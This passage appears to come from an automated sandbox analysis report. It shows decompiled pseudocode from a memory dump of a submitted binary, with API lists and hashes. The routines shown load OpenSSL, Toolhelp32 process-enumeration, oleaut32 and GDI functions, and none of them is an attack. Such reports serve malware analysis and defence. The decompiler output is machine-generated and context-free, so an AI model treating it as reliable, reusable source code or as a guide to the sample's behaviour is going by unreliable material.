                                                    					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
                                                    					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
                                                    					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
                                                    					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
                                                    					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
                                                    					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
                                                    					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
                                                    					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
                                                    					 *0x49d490 = E0049058C("SSL_new", _t158);
                                                    					 *0x49d494 = E0049058C("SSL_free", _t158);
                                                    					 *0x49d498 = E0049058C("SSL_accept", _t158);
                                                    					 *0x49d49c = E0049058C("SSL_connect", _t158);
                                                    					 *0x49d4a0 = E0049058C("SSL_read", _t158);
                                                    					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
                                                    					 *0x49d4a8 = E0049058C("SSL_write", _t158);
                                                    					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
                                                    					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
                                                    					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
                                                    					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
                                                    					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
                                                    					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
                                                    					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
                                                    					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
                                                    					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
                                                    					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
                                                    					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
                                                    					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
                                                    					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
                                                    					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
                                                    					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
                                                    					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
                                                    					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
                                                    					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
                                                    					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
                                                    					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
                                                    					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
                                                    					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
                                                    					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
                                                    					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
                                                    					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
                                                    					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
                                                    					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
                                                    					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
                                                    					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
                                                    					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
                                                    					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
                                                    					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
                                                    					 *0x49d52c = E0049058C("X509_digest", _t158);
                                                    					 *0x49d530 = E0049058C("EVP_md5", _t158);
                                                    					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
                                                    					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
                                                    					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
                                                    					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
                                                    					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
                                                    					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
                                                    					 *0x49d590 = E00490648("RAND_screen", _t158);
                                                    					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
                                                    					 *0x49d550 = E00490648("des_set_key", _t158);
                                                    					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
                                                    					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
                                                    					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
                                                    					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
                                                    					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
                                                    					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
                                                    					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
                                                    					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
                                                    					 *0x49d574 = E0049058C("SSL_get_current_cipher", _t158);
                                                    					 *0x49d578 = E0049058C("SSL_CIPHER_get_name", _t158);
                                                    					 *0x49d57c = E0049058C("SSL_CIPHER_get_version", _t158);
                                                    					 *0x49d580 = E0049058C("SSL_CIPHER_get_bits", _t158);
                                                    					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
                                                    						_t158 = 0;
                                                    					} else {
                                                    						_t158 = 1;
                                                    					}
                                                    				}
                                                    				return _t158;
                                                    			}

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                      • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                      • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                    • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                    • API String ID: 2574300362-3914122982
                                                    • Opcode ID: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                    • Opcode Fuzzy Hash: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                    • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E004728A4() {
                                                    
                                                    				if( *0x49ebf4 == 0) {
                                                    					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
                                                    					if( *0x49ebf4 != 0) {
                                                    						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
                                                    						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
                                                    						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
                                                    						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
                                                    						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
                                                    						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
                                                    						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
                                                    						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
                                                    						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
                                                    						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
                                                    						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
                                                    						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
                                                    						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
                                                    						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
                                                    						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
                                                    						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
                                                    					}
                                                    				}
                                                    				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					return 1;
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,?,?,00475AEA,00000000,00475BD5), ref: 004728B8
                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                    • API String ID: 667068680-597814768
                                                    • Opcode ID: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                    • Opcode Fuzzy Hash: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                    • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0040F7D0() {
                                                    				struct HINSTANCE__* _v8;
                                                    				intOrPtr _t46;
                                                    				void* _t91;
                                                    
                                                    				_v8 = GetModuleHandleA("oleaut32.dll");
                                                    				 *0x49e7a4 = E0040F7A4("VariantChangeTypeEx", E0040F340, _t91);
                                                    				 *0x49e7a8 = E0040F7A4("VarNeg", E0040F370, _t91);
                                                    				 *0x49e7ac = E0040F7A4("VarNot", E0040F370, _t91);
                                                    				 *0x49e7b0 = E0040F7A4("VarAdd", E0040F37C, _t91);
                                                    				 *0x49e7b4 = E0040F7A4("VarSub", E0040F37C, _t91);
                                                    				 *0x49e7b8 = E0040F7A4("VarMul", E0040F37C, _t91);
                                                    				 *0x49e7bc = E0040F7A4("VarDiv", E0040F37C, _t91);
                                                    				 *0x49e7c0 = E0040F7A4("VarIdiv", E0040F37C, _t91);
                                                    				 *0x49e7c4 = E0040F7A4("VarMod", E0040F37C, _t91);
                                                    				 *0x49e7c8 = E0040F7A4("VarAnd", E0040F37C, _t91);
                                                    				 *0x49e7cc = E0040F7A4("VarOr", E0040F37C, _t91);
                                                    				 *0x49e7d0 = E0040F7A4("VarXor", E0040F37C, _t91);
                                                    				 *0x49e7d4 = E0040F7A4("VarCmp", E0040F388, _t91);
                                                    				 *0x49e7d8 = E0040F7A4("VarI4FromStr", E0040F394, _t91);
                                                    				 *0x49e7dc = E0040F7A4("VarR4FromStr", E0040F400, _t91);
                                                    				 *0x49e7e0 = E0040F7A4("VarR8FromStr", E0040F46C, _t91);
                                                    				 *0x49e7e4 = E0040F7A4("VarDateFromStr", E0040F4D8, _t91);
                                                    				 *0x49e7e8 = E0040F7A4("VarCyFromStr", E0040F544, _t91);
                                                    				 *0x49e7ec = E0040F7A4("VarBoolFromStr", E0040F5B0, _t91);
                                                    				 *0x49e7f0 = E0040F7A4("VarBstrFromCy", E0040F630, _t91);
                                                    				 *0x49e7f4 = E0040F7A4("VarBstrFromDate", E0040F6A0, _t91);
                                                    				_t46 = E0040F7A4("VarBstrFromBool", E0040F710, _t91);
                                                    				 *0x49e7f8 = _t46;
                                                    				return _t46;
                                                    			}

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F7D9
                                                      • Part of subcall function 0040F7A4: GetProcAddress.KERNEL32(00000000), ref: 0040F7BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                    • API String ID: 1646373207-1918263038
                                                    • Opcode ID: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                    • Instruction ID: 068c6e066db7a12a78cda71ceaebb25bc6294a0e525a49770a7ca0196cea08b9
                                                    • Opcode Fuzzy Hash: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                    • Instruction Fuzzy Hash: 84411E656042049AD334EBAF794142A73C8D7D4724364C07FB804EBEE5DB7DA8498A2F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 77%
                                                    			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                    				int _v8;
                                                    				int _v12;
                                                    				char _v13;
                                                    				struct HDC__* _v20;
                                                    				void* _v24;
                                                    				void* _v28;
                                                    				long _v32;
                                                    				long _v36;
                                                    				struct HPALETTE__* _v40;
                                                    				intOrPtr* _t78;
                                                    				struct HPALETTE__* _t89;
                                                    				struct HPALETTE__* _t95;
                                                    				int _t171;
                                                    				intOrPtr _t178;
                                                    				intOrPtr _t180;
                                                    				struct HDC__* _t182;
                                                    				int _t184;
                                                    				void* _t186;
                                                    				void* _t187;
                                                    				intOrPtr _t188;
                                                    
                                                    				_t186 = _t187;
                                                    				_t188 = _t187 + 0xffffffdc;
                                                    				_v12 = __ecx;
                                                    				_v8 = __edx;
                                                    				_t182 = __eax;
                                                    				_t184 = _a16;
                                                    				_t171 = _a20;
                                                    				_v13 = 1;
                                                    				_t78 =  *0x49de34; // 0x49b0ec
                                                    				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
                                                    					_v40 = 0;
                                                    					_v20 = E00426060(CreateCompatibleDC(0));
                                                    					_push(_t186);
                                                    					_push(0x426484);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t188;
                                                    					_v24 = E00426060(CreateCompatibleBitmap(_a32, _t171, _t184));
                                                    					_v28 = SelectObject(_v20, _v24);
                                                    					_t89 =  *0x49e894; // 0x5e0807a3
                                                    					_v40 = SelectPalette(_a32, _t89, 0);
                                                    					SelectPalette(_a32, _v40, 0);
                                                    					if(_v40 == 0) {
                                                    						_t95 =  *0x49e894; // 0x5e0807a3
                                                    						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
                                                    					} else {
                                                    						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
                                                    					}
                                                    					RealizePalette(_v20);
                                                    					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
                                                    					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
                                                    					_v32 = SetTextColor(_t182, 0);
                                                    					_v36 = SetBkColor(_t182, 0xffffff);
                                                    					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
                                                    					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
                                                    					SetTextColor(_t182, _v32);
                                                    					SetBkColor(_t182, _v36);
                                                    					if(_v28 != 0) {
                                                    						SelectObject(_v20, _v28);
                                                    					}
                                                    					DeleteObject(_v24);
                                                    					_pop(_t178);
                                                    					 *[fs:eax] = _t178;
                                                    					_push(0x42648b);
                                                    					if(_v40 != 0) {
                                                    						SelectPalette(_v20, _v40, 0);
                                                    					}
                                                    					return DeleteDC(_v20);
                                                    				} else {
                                                    					_v24 = E00426060(CreateCompatibleBitmap(_a32, 1, 1));
                                                    					_v24 = SelectObject(_a12, _v24);
                                                    					_push(_t186);
                                                    					_push(0x4262d7);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t188;
                                                    					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, L00407A44(0xaa0029, 0xcc0020));
                                                    					_pop(_t180);
                                                    					 *[fs:eax] = _t180;
                                                    					_push(0x42648b);
                                                    					_v24 = SelectObject(_a12, _v24);
                                                    					return DeleteObject(_v24);
                                                    				}
                                                    			}

                                                    APIs
                                                    • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00426247
                                                    • SelectObject.GDI32(?,?), ref: 0042625C
                                                    • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                    • SelectObject.GDI32(?,?), ref: 004262C5
                                                    • DeleteObject.GDI32(?), ref: 004262D1
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 004262E5
                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00426306
                                                    • SelectObject.GDI32(?,?), ref: 0042631B
                                                    • SelectPalette.GDI32(?,5E0807A3,00000000), ref: 0042632F
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 00426341
                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 00426356
                                                    • SelectPalette.GDI32(?,5E0807A3,000000FF), ref: 0042636C
                                                    • RealizePalette.GDI32(?), ref: 00426378
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                    • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                    • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                    • SetTextColor.GDI32(?,?), ref: 0042642D
                                                    • SetBkColor.GDI32(?,?), ref: 00426437
                                                    • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                    • DeleteObject.GDI32(?), ref: 00426453
                                                    • SelectPalette.GDI32(?,00000000,00000000), ref: 00426475
                                                    • DeleteDC.GDI32(?), ref: 0042647E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                    • String ID:
                                                    • API String ID: 3976802218-0
                                                    • Opcode ID: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                    • Opcode Fuzzy Hash: f0ca5a636ac73ba622d966c104afb591202a263e1aac509bb4c4970d7894d6e6
                                                    • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 79%
                                                    			E00429708(void* __eax, long __ecx, struct HPALETTE__* __edx) {
                                                    				struct HBITMAP__* _v8;
                                                    				struct HDC__* _v12;
                                                    				struct HDC__* _v16;
                                                    				struct HDC__* _v20;
                                                    				char _v21;
                                                    				void* _v28;
                                                    				void* _v32;
                                                    				intOrPtr _v92;
                                                    				intOrPtr _v96;
                                                    				int _v108;
                                                    				int _v112;
                                                    				void _v116;
                                                    				int _t68;
                                                    				long _t82;
                                                    				void* _t117;
                                                    				intOrPtr _t126;
                                                    				intOrPtr _t127;
                                                    				long _t130;
                                                    				struct HPALETTE__* _t133;
                                                    				void* _t137;
                                                    				void* _t139;
                                                    				intOrPtr _t140;
                                                    
                                                    				_t137 = _t139;
                                                    				_t140 = _t139 + 0xffffff90;
                                                    				_t130 = __ecx;
                                                    				_t133 = __edx;
                                                    				_t117 = __eax;
                                                    				_v8 = 0;
                                                    				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                                    					return _v8;
                                                    				} else {
                                                    					E00428BFC(_t117);
                                                    					_v12 = 0;
                                                    					_v20 = 0;
                                                    					_push(_t137);
                                                    					_push(0x429903);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t140;
                                                    					_v12 = E00426060(GetDC(0));
                                                    					_v20 = E00426060(CreateCompatibleDC(_v12));
                                                    					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
                                                    					if(_v8 == 0) {
                                                    						L17:
                                                    						_t68 = 0;
                                                    						_pop(_t126);
                                                    						 *[fs:eax] = _t126;
                                                    						_push(0x42990a);
                                                    						if(_v20 != 0) {
                                                    							_t68 = DeleteDC(_v20);
                                                    						}
                                                    						if(_v12 != 0) {
                                                    							return ReleaseDC(0, _v12);
                                                    						}
                                                    						return _t68;
                                                    					} else {
                                                    						_v32 = SelectObject(_v20, _v8);
                                                    						if(_t130 != 0x1fffffff) {
                                                    							_v16 = E00426060(CreateCompatibleDC(_v12));
                                                    							_push(_t137);
                                                    							_push(0x4298bb);
                                                    							_push( *[fs:eax]);
                                                    							 *[fs:eax] = _t140;
                                                    							if(_v96 == 0) {
                                                    								_v21 = 0;
                                                    							} else {
                                                    								_v21 = 1;
                                                    								_v92 = 0;
                                                    								_t117 = E00429040(_t117, _t133, _t133, 0,  &_v116);
                                                    							}
                                                    							_v28 = SelectObject(_v16, _t117);
                                                    							if(_t133 != 0) {
                                                    								SelectPalette(_v16, _t133, 0);
                                                    								RealizePalette(_v16);
                                                    								SelectPalette(_v20, _t133, 0);
                                                    								RealizePalette(_v20);
                                                    							}
                                                    							_t82 = SetBkColor(_v16, _t130);
                                                    							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
                                                    							SetBkColor(_v16, _t82);
                                                    							if(_v28 != 0) {
                                                    								SelectObject(_v16, _v28);
                                                    							}
                                                    							if(_v21 != 0) {
                                                    								DeleteObject(_t117);
                                                    							}
                                                    							_pop(_t127);
                                                    							 *[fs:eax] = _t127;
                                                    							_push(0x4298c2);
                                                    							return DeleteDC(_v16);
                                                    						} else {
                                                    							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                                    							if(_v32 != 0) {
                                                    								SelectObject(_v20, _v32);
                                                    							}
                                                    							goto L17;
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetObjectA.GDI32(?,00000054,?), ref: 0042972B
                                                    • GetDC.USER32(00000000), ref: 00429759
                                                    • CreateCompatibleDC.GDI32(?), ref: 0042976A
                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00429785
                                                    • SelectObject.GDI32(?,00000000), ref: 0042979F
                                                    • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 004297C1
                                                    • CreateCompatibleDC.GDI32(?), ref: 004297CF
                                                    • SelectObject.GDI32(?), ref: 00429817
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0042982A
                                                    • RealizePalette.GDI32(?), ref: 00429833
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0042983F
                                                    • RealizePalette.GDI32(?), ref: 00429848
                                                    • SetBkColor.GDI32(?), ref: 00429852
